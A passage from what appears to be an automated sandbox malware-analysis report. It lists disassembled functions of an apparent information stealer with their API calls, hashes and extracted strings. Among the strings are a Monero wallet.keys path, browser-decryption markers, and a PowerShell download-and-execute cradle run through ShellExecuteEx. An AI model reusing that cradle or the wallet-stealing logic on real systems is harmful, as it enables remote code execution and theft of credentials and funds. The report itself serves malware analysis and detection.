                  • Opcode Fuzzy Hash: 066a17d722f05ad050400740137376981fea9aff29e46be03037c6f9375cafd0
                  • Instruction Fuzzy Hash: 360162B5A04308BFDB00EBE4DD49F6DB7B8FB58701F108554FA05D72A2EA709945CB51
                  Function 00887720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0088773B
                  • RegOpenKeyExA.ADVAPI32(80000002,015CB7A8,00000000,00020119,008876B9), ref: 0088775B
                  • RegQueryValueExA.ADVAPI32(008876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0088777A
                  • RegCloseKey.ADVAPI32(008876B9), ref: 00887784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: c432a7eab93abed8d1666c7b402a8ec6d69f01afa5c220af8bbd745053c562e3
                  • Instruction ID: aaede35a75278eebe7075b9522591f54d9d42e2cb2004a2261fb084b5f506c33
                  • Opcode Fuzzy Hash: c432a7eab93abed8d1666c7b402a8ec6d69f01afa5c220af8bbd745053c562e3
                  • Instruction Fuzzy Hash: 580144B5A40308BFDB00EBE4DC49FAEB7B8EB54700F104154FA05E7291DA7455418B51
                  Function 008840B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 008840D5
                  • RegOpenKeyExA.ADVAPI32(80000001,015DD298,00000000,00020119,?), ref: 008840F4
                  • RegQueryValueExA.ADVAPI32(?,015DDD70,00000000,00000000,00000000,000000FF), ref: 00884118
                  • RegCloseKey.ADVAPI32(?), ref: 00884122
                  • lstrcat.KERNEL32(?,00000000), ref: 00884147
                  • lstrcat.KERNEL32(?,015DDBC0), ref: 0088415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: d61f1c9fbd0ec14e8c515592afe199ee917069ad8bdb3788fc090ac130e677bd
                  • Instruction ID: bd714630d5b8d71ae41040828945c0c77b262d2c4e7c165397e5a54b9d3fd5e9
                  • Opcode Fuzzy Hash: d61f1c9fbd0ec14e8c515592afe199ee917069ad8bdb3788fc090ac130e677bd
                  • Instruction Fuzzy Hash: 54419AB69001086BDB14FBE4DC46FFD733DF758300F408658B61996192EA759B898B93
                  Function 008799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                  • LocalFree.KERNEL32(0087148F), ref: 00879A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: af2af28c208d4fff65c3d7ddd3acd3aea4f84a6e0dfe8ec96c5637a6ce18ab74
                  • Instruction ID: 1f35943300f8912ff33954eb37cb5be1b6229dd148b69352aaf05321c71e74d9
                  • Opcode Fuzzy Hash: af2af28c208d4fff65c3d7ddd3acd3aea4f84a6e0dfe8ec96c5637a6ce18ab74
                  • Instruction Fuzzy Hash: 8D312BB4A00209EFDB14CFA4C885BAEB7B5FF58350F108158E905E7294D778E941CFA1
                  Function 0088C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: b63eedaf813d80a768a8319c740c47cef6a382bdb8619850c4d07a262735852b
                  • Instruction ID: 4c955b1bedb52ca50e6a688c8ebb6e633503dac79b00a07546c809d00401953f
                  • Opcode Fuzzy Hash: b63eedaf813d80a768a8319c740c47cef6a382bdb8619850c4d07a262735852b
                  • Instruction Fuzzy Hash: F241F6B110079C5EDB25AB288D84FFB7FE8FB45708F1444E8E98AC6186E2719A458F70
                  Function 00884780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,015DDC80), ref: 008847DB
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00884801
                  • lstrcat.KERNEL32(?,?), ref: 00884820
                  • lstrcat.KERNEL32(?,?), ref: 00884834
                  • lstrcat.KERNEL32(?,015CAFC8), ref: 00884847
                  • lstrcat.KERNEL32(?,?), ref: 0088485B
                  • lstrcat.KERNEL32(?,015DD1B8), ref: 0088486F
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 00888D90: GetFileAttributesA.KERNEL32(00000000,?,00871B54,?,?,0089564C,?,?,00890E1F), ref: 00888D9F
                    • Part of subcall function 00884570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00884580
                    • Part of subcall function 00884570: RtlAllocateHeap.NTDLL(00000000), ref: 00884587
                    • Part of subcall function 00884570: wsprintfA.USER32 ref: 008845A6
                    • Part of subcall function 00884570: FindFirstFileA.KERNEL32(?,?), ref: 008845BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 8271e6c280a0e7854048c889ff642869b81cb45ad304d352bb91097179193250
                  • Instruction ID: 76039ea180290ac0a45a125a292bf004549d48c31cfd8d72772b004e388ecd94
                  • Opcode Fuzzy Hash: 8271e6c280a0e7854048c889ff642869b81cb45ad304d352bb91097179193250
                  • Instruction Fuzzy Hash: 2C317FB2900208A7CB14FBF4DC85EE9777CFB58700F404589B31996092EE749B898B92
                  Function 00882C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00882D85
                  Strings
                  • <, xrefs: 00882D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00882CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00882D04
                  • ')", xrefs: 00882CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 0b2afd006df1a6f6d0c5542f986fd748d9f12e43f8d1932f639c69bde0d8e627
                  • Instruction ID: b38d19eb2449044e2568ff906e409a1a01f2b72cd8eb47ae492ed0fd0d31f0ba
                  • Opcode Fuzzy Hash: 0b2afd006df1a6f6d0c5542f986fd748d9f12e43f8d1932f639c69bde0d8e627
                  • Instruction Fuzzy Hash: A241AC718102189AEB18FBA4CC91BDDBB74FF14700F40416AE116E61D2DF786A4ACFA2
                  Function 00879E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00879F41
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 469b5f20286e5e59577f9739c145b581c5f97117bdb21049592279523e14d130
                  • Instruction ID: dab9142ccdd1aee1615285dec22cb8d57d5079e3877578750dd1753e06804726
                  • Opcode Fuzzy Hash: 469b5f20286e5e59577f9739c145b581c5f97117bdb21049592279523e14d130
                  • Instruction Fuzzy Hash: 22612C71900248DBDF18EFA8CC96BED7775FF54304F008518F90A9B695EB74AA05CB92
                  Function 00886920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0088696C
                  • sscanf.NTDLL ref: 00886999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008869B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008869C0
                  • ExitProcess.KERNEL32 ref: 008869DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 40f052a415a1f2ccc53a22da4cd826610aca83735ea9425512fa97335cc4034a
                  • Instruction ID: a90ee7860f08452e8a4e54e23da890263b87d6f33cdaa6c91b5cb94f8e931a02
                  • Opcode Fuzzy Hash: 40f052a415a1f2ccc53a22da4cd826610aca83735ea9425512fa97335cc4034a
                  • Instruction Fuzzy Hash: A021DC75D14208ABCF08EFE8D9459EEB7B5FF58300F04856EE406E3251EB345615CBA5
                  Function 00887E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,015CBCE8,00000000,00020119,?), ref: 00887E5E
                  • RegQueryValueExA.ADVAPI32(?,015DD398,00000000,00000000,000000FF,000000FF), ref: 00887E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00887E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 802ad2ff5ca2a09ffdb3aa952c16924b6d83c7d81f6635766b75d34b10a0b69f
                  • Instruction ID: ba64d9d7ffdbcfc07e0a5585df50893307d23fad622cc179f5c41bea4601a687
                  • Opcode Fuzzy Hash: 802ad2ff5ca2a09ffdb3aa952c16924b6d83c7d81f6635766b75d34b10a0b69f
                  • Instruction Fuzzy Hash: E8118CB2A44209EBD710DFD4DC49FBBBBB8FB04B10F204259F605E7291D77458018BA1
                  Function 00889260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(015DDAA0,?,?,?,0088140C,?,015DDAA0,00000000), ref: 0088926C
                  • lstrcpyn.KERNEL32(00ABAB88,015DDAA0,015DDAA0,?,0088140C,?,015DDAA0), ref: 00889290
                  • lstrlen.KERNEL32(?,?,0088140C,?,015DDAA0), ref: 008892A7
                  • wsprintfA.USER32 ref: 008892C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: f7a958e709a273b8eb8d9ccbafd7529b6121c4fa65df8eab07aec23776816cb8
